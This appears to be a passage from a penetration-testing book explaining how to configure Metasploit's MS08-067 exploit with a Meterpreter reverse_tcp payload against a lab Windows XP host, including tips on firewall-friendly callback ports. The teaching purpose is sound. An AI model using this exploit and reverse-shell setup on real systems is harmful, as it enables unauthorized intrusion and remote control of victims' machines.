The Joy of Exploitation
Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.33.130   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST     192.168.33.129   yes       The local address
   LPORT     8080             yes       The local port

Exploit target:

   Id  Name
   --  ----
   3   Windows XP SP2 English (NX)

We search for the MS08-067 NetAPI exploit in the Framework. Then, having found our exploit, we load the windows/smb/ms08_067_netapi exploit. Next, we set the payload as the Windows-based Meterpreter reverse_tcp, which, if successful, will start a connection on the target machine and connect back to the attacking machine specified with LHOST. This is important if you find that a firewall is in place and you need to bypass incoming controls on a firewall or NAT.

Meterpreter is a post-exploitation tool that we’ll use throughout this book. One of Metasploit’s flagship tools, it makes extracting information or further compromising systems significantly easier.

The show targets command allows us to identify the system we want to target. (Although many MSF exploits use automatic targeting and don’t require this flag, autodetection capability generally fails in MS08-067.) We then set our target to Windows XP SP2 English (NX). The NX stands for No Execute. By default in Windows XP SP2, DEP (Data Execution Prevention) is enabled.

By defining the RHOST value, we set the IP address of our target machine, which is vulnerable to the MS08-067 exploit.

The set LHOST command specifies our attacking machine’s IP address (the Back|Track machine), and the LPORT option specifies the port on which our attacking machine will listen for a connection from our target. (When you’re setting the LPORT option, use a standard port that you think will be allowed through the firewall: Ports 443, 80, 53, and 8080 are often good options.) Finally, we enter show options to make sure that the options are set up correctly.